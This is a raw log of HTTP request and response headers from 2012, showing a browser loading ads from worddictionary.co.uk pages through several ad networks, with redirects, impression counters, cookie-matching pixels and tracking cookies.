Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/djs28.html
HTTP/1.0 302 Moved Temporarily

HTTP/1.0 302 Moved Temporarily
Connection: keep-alive
P3P: CP=&quot;NOI DSP DEVa OUR BUS UNI COM NAV INT&quot;
Cache-Control: no-cache
Location: http://adnet.affinity.com/addyn/3.0/5359.1/2462299/0/170/ADTECH;cfp=1;rndc=1352402957;loc=100;cookie=info;target=_blank;key=;grp=[group];misc=99019805cf7d4f70a346c81cf77a1a22;rdclick=;kvuniqimp=99019805cf7d4f70a346c81cf77a1a22;kvafseq=1
Content-Length: 0
Set-Cookie: CfP=1;domain=affinity.com;path=/
GET /addyn/3.0/5359.1/2525344/0/225/ADTECH;cfp=1;rndc=1352402957;loc=100;cookie=info;target=_blank;key=;grp=[group];misc=1ba1c8f0058f49648c0efc3680e7e9a7;rdclick=;kvuniqimp=1ba1c8f0058f49648c0efc3680e7e9a7;kvafseq=1 HTTP/1.1

Host: adnet.affinity.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/zsa52.html
Cookie: CfP=1; JEB2=509C014D6E651A59D48D8D35F0024347
HTTP/1.0 200 OK

Content-Type: application/x-javascript
Connection: keep-alive
Server: Adtech Adserver
Cache-Control: no-cache
Content-Length: 438
GET /ttj?id=931097 HTTP/1.1

Host: adpx.metanetwork.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/zsa52.html
HTTP/1.1 302 Found

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Location: http://ib.adnxs.com/ttj?id=931097
Date: Thu, 08 Nov 2012 19:29:17 GMT
Content-Length: 0
GET /addyn/3.0/5359.1/2525343/0/170/ADTECH;cfp=1;rndc=1352402956;loc=100;cookie=info;target=_blank;key=;grp=[group];misc=94d598502bac4b559a899e4aa10d9383;rdclick=;kvuniqimp=94d598502bac4b559a899e4aa10d9383;kvafseq=1 HTTP/1.1

Host: adnet.affinity.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/xxz97.html
Cookie: CfP=1; JEB2=509C014D6E651A59D48D8D35F0024347
HTTP/1.0 200 OK

Content-Type: application/x-javascript
Connection: keep-alive
Server: Adtech Adserver
Cache-Control: no-cache
Content-Length: 438
GET /ttj?id=931096 HTTP/1.1

Host: adpx.metanetwork.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/xxz97.html
HTTP/1.1 302 Found

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Location: http://ib.adnxs.com/ttj?id=931096
Date: Thu, 08 Nov 2012 19:29:17 GMT
Content-Length: 0
GET /addyn/3.0/5359.1/2462299/0/170/ADTECH;cfp=1;rndc=1352402957;loc=100;cookie=info;target=_blank;key=;grp=[group];misc=99019805cf7d4f70a346c81cf77a1a22;rdclick=;kvuniqimp=99019805cf7d4f70a346c81cf77a1a22;kvafseq=1 HTTP/1.1

Host: adnet.affinity.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/djs28.html
Cookie: CfP=1; JEB2=509C014D6E651A59D48D8D35F0024347
HTTP/1.0 200 OK

Content-Type: application/x-javascript
Connection: keep-alive
Server: Adtech Adserver
Cache-Control: no-cache
Content-Length: 438
GET /ttj?id=931096 HTTP/1.1

Host: adpx.metanetwork.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/djs28.html
HTTP/1.1 302 Found

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Location: http://ib.adnxs.com/ttj?id=931096
Date: Thu, 08 Nov 2012 19:29:17 GMT
Content-Length: 0
GET /adcount/3.0/5359/2525344/0/225/AdId=3362529;BnId=4;ct=3655597684;st=1767;adcid=1;itime=402957286;reqtype=5;;kvuniqimp=1ba1c8f0058f49648c0efc3680e7e9a7;kvafseq=1 HTTP/1.1

Host: adnet.affinity.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/zsa52.html
Cookie: CfP=1; JEB2=509C014D6E651A59D48D8D35F0024347
HTTP/1.0 200 OK

Content-Type: application/x-javascript
Connection: keep-alive
Cache-Control: no-cache
Content-Length: 1
GET /adcount/3.0/5359/2525343/0/170/AdId=3362529;BnId=3;ct=3655626432;st=1855;adcid=1;itime=402957385;reqtype=5;;kvuniqimp=94d598502bac4b559a899e4aa10d9383;kvafseq=1 HTTP/1.1

Host: adnet.affinity.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/xxz97.html
Cookie: CfP=1; JEB2=509C014D6E651A59D48D8D35F0024347
HTTP/1.0 200 OK

Content-Type: application/x-javascript
Connection: keep-alive
Cache-Control: no-cache
Content-Length: 1
GET /ttj?id=931097 HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/zsa52.html
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FSnBvk$$qk[$u)3b1xV!aGh[WNFD')WKrNw+fmn4H2rU8-CO^; sess=1; icu=ChIImNsIEAoYAiACKAIwjZDwhAUQjZDwhAUYAQ..
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Wed, 06-Feb-2013 19:29:17 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Fri, 09-Nov-2012 19:29:17 GMT; domain=.adnxs.com; HttpOnly icu=ChIImNsIEAoYAyADKAMwjZDwhAUQjZDwhAUYAg..; path=/; expires=Wed, 06-Feb-2013 19:29:17 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]14FSnBvk$$qk[$u)3b1xV!aGh[WNFD')WKrNw+fmn4H2rWK@p7Fl0]o%MzB$z; path=/; expires=Wed, 06-Feb-2013 19:29:17 GMT; domain=.adnxs.com; HttpOnly
Date: Thu, 08 Nov 2012 19:29:17 GMT
Content-Length: 793
GET /ttj?id=931096 HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/xxz97.html
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FSnBvk$$qk[$u)3b1xV!aGh[WNFD')WKrNw+fmn4H2rU8-CO^; sess=1; icu=ChIImNsIEAoYAiACKAIwjZDwhAUQjZDwhAUYAQ..
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Wed, 06-Feb-2013 19:29:17 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Fri, 09-Nov-2012 19:29:17 GMT; domain=.adnxs.com; HttpOnly icu=ChIImNsIEAoYAyADKAMwjZDwhAUQjZDwhAUYAg..; path=/; expires=Wed, 06-Feb-2013 19:29:17 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]14FSnBvk$$qk[$u)3b1xV!aGh[WNFD')WKrNw+fmn4H2rWK@p7Fl0]o%MzB$z; path=/; expires=Wed, 06-Feb-2013 19:29:17 GMT; domain=.adnxs.com; HttpOnly
Date: Thu, 08 Nov 2012 19:29:17 GMT
Content-Length: 722
GET /p/eb/31/71/3c/eb31713cc1a19f82adf9de8175abaef4.png HTTP/1.1

Host: cdn.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/xxz97.html
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]14FSnBvk$$qk[$u)3b1xV!aGh[WNFD')WKrNw+fmn4H2rWK@p7Fl0]o%MzB$z; sess=1; icu=ChIImNsIEAoYAyADKAMwjZDwhAUQjZDwhAUYAg..
HTTP/1.1 200 OK

Content-Type: image/png
Server: Apache
Etag: &quot;eb31713cc1a19f82adf9de8175abaef4:1347909729&quot;
Last-Modified: Mon, 17 Sep 2012 19:22:09 GMT
Accept-Ranges: bytes
Content-Length: 23616
Date: Thu, 08 Nov 2012 19:29:17 GMT
Connection: keep-alive
GET /adcount/3.0/5359/2462299/0/170/AdId=3362529;BnId=3;ct=3655658284;st=1536;adcid=1;itime=402957466;reqtype=5;;kvuniqimp=99019805cf7d4f70a346c81cf77a1a22;kvafseq=1 HTTP/1.1

Host: adnet.affinity.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/djs28.html
Cookie: CfP=1; JEB2=509C014D6E651A59D48D8D35F0024347
HTTP/1.0 200 OK

Content-Type: application/x-javascript
Connection: keep-alive
Cache-Control: no-cache
Content-Length: 1
GET /pixel?google_nid=appnexus1&google_sc&google_hm=NTg1ODcyMTg1OTQyNjc4MTg1Ng%3D%3D HTTP/1.1

Host: cm.g.doubleclick.net
GET /pixel?google_nid=appnexus1&amp;google_sc&amp;google_hm=NTg1ODcyMTg1OTQyNjc4MTg1Ng%3D%3D HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/xxz97.html
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Location: http://adx.adnxs.com/mapuid?member=181&amp;user=
Date: Thu, 08 Nov 2012 19:29:18 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Server: Cookie Matcher
Content-Length: 245
X-XSS-Protection: 1; mode=block
GET /ttj?id=931096 HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/djs28.html
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FSnBvk$$qk[$u)3b1xV!aGh[WNFD')WKrNw+fmn4H2rU8-CO^; sess=1; icu=ChIImNsIEAoYAiACKAIwjZDwhAUQjZDwhAUYAQ..
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Wed, 06-Feb-2013 19:29:17 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Fri, 09-Nov-2012 19:29:17 GMT; domain=.adnxs.com; HttpOnly icu=ChIImNsIEAoYAyADKAMwjpDwhAUQjpDwhAUYAg..; path=/; expires=Wed, 06-Feb-2013 19:29:18 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW_u^m(g^zRl1D*rj1#FaDESu.=a*@]FS-Cw9vWNFD')WKrNw+fmn4H2rWK@p7Fl0]o%E&gt;/&gt;?; path=/; expires=Wed, 06-Feb-2013 19:29:18 GMT; domain=.adnxs.com; HttpOnly
Date: Thu, 08 Nov 2012 19:29:18 GMT
Content-Length: 930
GET /serve?ms=16384&cb=275834294&aid=9140&eid=27&pp=0.164858&bp=0.164858&ref=http://worddictionary.co.uk/static//inpage-affinity/knw79.html&click=http://ib.adnxs.com/click?qvI9IxEaxT9mWlE53P3CPwAAAAAAAPA_ZlpROdz9wj-q8j0jERrFP8E3HEK4geQ0oArzhH1cTlENCJxQAAAAABk1DgA8AQAARwEAAAIAAACEzC4A9pkCAAAAAQBVU0QAVVNEANgCWgB5MAAA700AAgUCAQUAAIQAhiGuiwAAAAA./cnd=%21rwR_JAiJSRCEmbsBGPazCiAA/referrer=http%3A%2F%2Fworddictionary.co.uk%2Fstatic%2F%2Finpage-affinity%2Fknw79.html/clickenc= HTTP/1.1

Host: delivery.steelhousemedia.com
GET /serve?ms=16384&amp;cb=275834294&amp;aid=9140&amp;eid=27&amp;pp=0.164858&amp;bp=0.164858&amp;ref=http://worddictionary.co.uk/static//inpage-affinity/knw79.html&amp;click=http://ib.adnxs.com/click?qvI9IxEaxT9mWlE53P3CPwAAAAAAAPA_ZlpROdz9wj-q8j0jERrFP8E3HEK4geQ0oArzhH1cTlENCJxQAAAAABk1DgA8AQAARwEAAAIAAACEzC4A9pkCAAAAAQBVU0QAVVNEANgCWgB5MAAA700AAgUCAQUAAIQAhiGuiwAAAAA./cnd=%21rwR_JAiJSRCEmbsBGPazCiAA/referrer=http%3A%2F%2Fworddictionary.co.uk%2Fstatic%2F%2Finpage-affinity%2Fknw79.html/clickenc= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/knw79.html
HTTP/1.1 200 OK

Content-Type: text/html;charset=UTF-8
P3P: CP=&quot;NON DSP COR NID CURa ADMa DEVa PSAa PSDa OUR STP UNI COM NAV INT STA PRE&quot;
Set-Cookie: guid=0f13c904-2dbc-4979-ab54-86512dd92c0f;Path=/;Domain=.steelhousemedia.com;Expires=Tue, 26-Nov-2080 22:43:25 GMT ccc=;Path=/;Domain=.steelhousemedia.com;Expires=Thu, 08-Nov-2012 19:29:19 GMT view=;Path=/;Domain=.steelhousemedia.com;Expires=Thu, 08-Nov-2012 19:29:19 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Encoding: gzip
Content-Length: 1841
Connection: close
GET /IFR_IP_WEB.html HTTP/1.1

Host: backfill.ph.affinity.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/xxz97.html
Cookie: PHUU=803093fc02080839d9057141d44daea6; CfP=1; JEB2=509C014D6E651A59D48D8D35F0024347
HTTP/1.1 200 OK

Content-Type: text/html
Server: nginx
Date: Thu, 08 Nov 2012 19:29:17 GMT
Content-Length: 882
Last-Modified: Wed, 08 Aug 2012 14:53:15 GMT
Connection: keep-alive
Expires: Sun, 09 Dec 2012 19:29:17 GMT
Cache-Control: max-age=2678400
Accept-Ranges: bytes
GET /if?enc=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAPA_AAAAAAAAAAAAAAAAAAAAAI8jMIONpfkPoArzhH1cTlENCJxQAAAAABg1DgA8AQAAKQQAAAIAAAARnikA9pkCAAAAAABVU0QAVVNEACwB-gB4MAAAa00AAgMCAQUAAIQAiREsIwAAAAA.&cnd=%21Zh9q2giRsSAQkbymARgAIPazCjAEOPjgCEABSKkIUJjqOFgAYNgGaABwCHj4BIABGIgB-ASQAQGYAQGgAQKoAQCwAQC5AQAAAAAAAAAAwQEAAAAAAAAAAMkBS7lU0As3wz_ZAR-F61G4Huk_4AEA&udj=uf%28%27a%27%2C+40438%2C+1352402958%29%3Buf%28%27c%27%2C+530577%2C+1352402958%29%3Buf%28%27r%27%2C+2727441%2C+1352402958%29%3B&ccd=%21WwWoLQiRsSAQkbymARj2swogAQ..&vpid=46&referrer=http%3A%2F%2Fworddictionary.co.uk%2Fstatic%2F%2Finpage-affinity%2Fdjs28.html&dlo=1 HTTP/1.1

Host: ib.adnxs.com
GET /if?enc=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAPA_AAAAAAAAAAAAAAAAAAAAAI8jMIONpfkPoArzhH1cTlENCJxQAAAAABg1DgA8AQAAKQQAAAIAAAARnikA9pkCAAAAAABVU0QAVVNEACwB-gB4MAAAa00AAgMCAQUAAIQAiREsIwAAAAA.&amp;cnd=%21Zh9q2giRsSAQkbymARgAIPazCjAEOPjgCEABSKkIUJjqOFgAYNgGaABwCHj4BIABGIgB-ASQAQGYAQGgAQKoAQCwAQC5AQAAAAAAAAAAwQEAAAAAAAAAAMkBS7lU0As3wz_ZAR-F61G4Huk_4AEA&amp;udj=uf%28%27a%27%2C+40438%2C+1352402958%29%3Buf%28%27c%27%2C+530577%2C+1352402958%29%3Buf%28%27r%27%2C+2727441%2C+1352402958%29%3B&amp;ccd=%21WwWoLQiRsSAQkbymARj2swogAQ..&amp;vpid=46&amp;referrer=http%3A%2F%2Fworddictionary.co.uk%2Fstatic%2F%2Finpage-affinity%2Fdjs28.html&amp;dlo=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/djs28.html
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW_u^m(g^zRl1D*rj1#FaDESu.=a*@]FS-Cw9vWNFD')WKrNw+fmn4H2rWK@p7Fl0]o%E&gt;/&gt;?; sess=1; icu=ChIImNsIEAoYAyADKAMwjpDwhAUQjpDwhAUYAg..
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Wed, 06-Feb-2013 19:29:18 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Fri, 09-Nov-2012 19:29:18 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW_u^m(g^zRl1D*rj1#FaDESu.=a*@]FS-Cw9vWNFD')WKrNw+fmn4H2rWK@p7Fl0]o%E&gt;/&gt;?; path=/; expires=Wed, 06-Feb-2013 19:29:18 GMT; domain=.adnxs.com; HttpOnly
Date: Thu, 08 Nov 2012 19:29:18 GMT
Content-Length: 1799
GET /pixel?google_nid=appnexus1&google_sc&google_hm=NTg1ODcyMTg1OTQyNjc4MTg1Ng%3D%3D HTTP/1.1

Host: cm.g.doubleclick.net
GET /pixel?google_nid=appnexus1&amp;google_sc&amp;google_hm=NTg1ODcyMTg1OTQyNjc4MTg1Ng%3D%3D HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/djs28.html
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Location: http://adx.adnxs.com/mapuid?member=181&amp;user=
Date: Thu, 08 Nov 2012 19:29:18 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Server: Cookie Matcher
Content-Length: 245
X-XSS-Protection: 1; mode=block
GET /mapuid?member=181&user= HTTP/1.1

Host: adx.adnxs.com
GET /mapuid?member=181&amp;user= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/xxz97.html
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]14FSnBvk$$qk[$u)3b1xV!aGh[WNFD')WKrNw+fmn4H2rWK@p7Fl0]o%MzB$z; sess=1; icu=ChIImNsIEAoYAyADKAMwjZDwhAUQjZDwhAUYAg..
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Wed, 06-Feb-2013 19:29:18 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Fri, 09-Nov-2012 19:29:18 GMT; domain=.adnxs.com; HttpOnly uuid2=5858721859426781856; path=/; expires=Wed, 06-Feb-2013 19:29:18 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Date: Thu, 08 Nov 2012 19:29:18 GMT
GET /static/a2/img/ASquared.png HTTP/1.1

Host: cdn4s.steelhousemedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/knw79.html
Cookie: guid=0f13c904-2dbc-4979-ab54-86512dd92c0f; ccc=; view=
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Date: Thu, 08 Nov 2012 19:29:18 GMT
Etag: &quot;32be90-1ed-4ca79cd1e2100&quot;
Last-Modified: Mon, 24 Sep 2012 22:06:28 GMT
Server: ECS (arn/46E6)
X-Cache: HIT
Content-Length: 493
GET /mapuid?member=181&user= HTTP/1.1

Host: adx.adnxs.com
GET /mapuid?member=181&amp;user= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
